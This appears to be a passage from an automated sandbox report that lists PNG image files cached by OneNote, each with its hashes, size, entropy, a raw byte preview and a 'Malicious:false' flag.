                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
